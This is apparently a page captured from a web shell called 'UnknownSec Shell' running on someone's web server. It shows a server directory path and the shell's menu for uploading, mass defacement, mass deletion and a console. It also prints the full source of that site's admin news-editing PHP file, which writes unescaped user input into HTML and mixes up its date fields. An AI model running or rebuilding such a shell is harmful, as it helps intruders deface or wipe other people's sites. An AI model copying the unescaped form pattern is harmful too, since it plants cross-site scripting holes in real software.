shell bypass 403
UnknownSec Shell
:
/
var
/
www
/
html
/
views
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
v_admin_news_edit.php
<?php if ($_POST['submitBut'] == 'Edit'){ $News = new News; $row = $News->get($_POST['newsID'], '', ''); $newsID = $_POST['newsID']; $dispTitle = $row['dispTitle']; $message = $row['message']; $xAttach = $row['attach']; $link = $row['link']; $dateTS = $row['dateTS']; $month = date('n', $dateTS); $date = date('j', $dateTS); $year = date('Y', $dateTS); $action = 'Edit'; } else if ($_POST['submitBut'] == 'Save'){ // return data from form $newsID = $_POST['newsID']; $dispTitle = $_POST['dispTitle']; $message = $_POST['message']; $xAttach = $_POST['xAttach']; $link = $_POST['link']; $month = $_POST['month']; $date = $_POST['date']; $year = $_POST['date']; $action = $_POST['action']; } else { // initialize variables $newsID = ''; $dispTitle = ''; $message = ''; $xAttach = ''; $link = ''; $month = ''; $date = ''; $year = ''; $action = 'Add'; } echo "<div class='col-12 input_form'> <H1>". $action . " Post</H1> <form action='' method='post' enctype='multipart/form-data' name='edit'> <input type='hidden' name='newsID' value='".$newsID."'> <input type='hidden' name='xAttach' value='".$xAttach."'> <input type='hidden' name='action' value='".$action."'>"; if ($newsID > 0){ echo " <div class='col-12'><b>ID#: </b>".$newsID."</div> "; } echo " <div class='col-6 pad_top'><b>Title:</b> <input type='text' name='dispTitle' value='".$dispTitle."' style='width: 80%' maxlength=50> </div> <div class='col-6 pad_top'><b>Date: </b>"; $Select_month = new Select_month('month', 'F', $month, '[month]', '', 'edit'); $Select_date = new Select_date('date', $date, '[date]', '', 'edit'); $Select_year = new Select_year('year', date('Y'), '2016', $year, '[year]', '', 'edit'); echo " </div> <div class='col-12 pad_top'><b>Content: </b><br> <textarea name='message' id='message'>".$message."</textarea> </div> <script> CKEDITOR.replace('message'); </script> <div class='col-12 pad_top'> <div class='col-6'> <b>Attach a file: <span class='comment'>(optional) PDF or Image- png, jpg, gif</span> </b><input type='file' id='attach' name='attach'> </div> <div class='col-6 right'>"; if ($xAttach != ''){ if(strpos($xAttach, '.pdf')){ echo $xAttach; } else { echo "<img src='views/images/news/".$xAttach."' width=120 > <span style='font-size: x-small'>".$xAttach ."</span><br> <input type='checkbox' name='delAttach'> Delete attachment"; } } echo " </div> </div> <div class='col-12 pad_top'><b>Website link:</b> <span class='comment'>(optional)</span> <input type='link' name='link' style='width: 60%' maxlength=50 value='".$link."'> </div> <div class='col-12 top_line centre'> <input type='submit' name='submitBut' value='Cancel' class='button cancel_but'> <input type='submit' name='submitBut' value='Save' class='button edit_save_but'> </div> </form> </div>";
© 2026 UnknownSec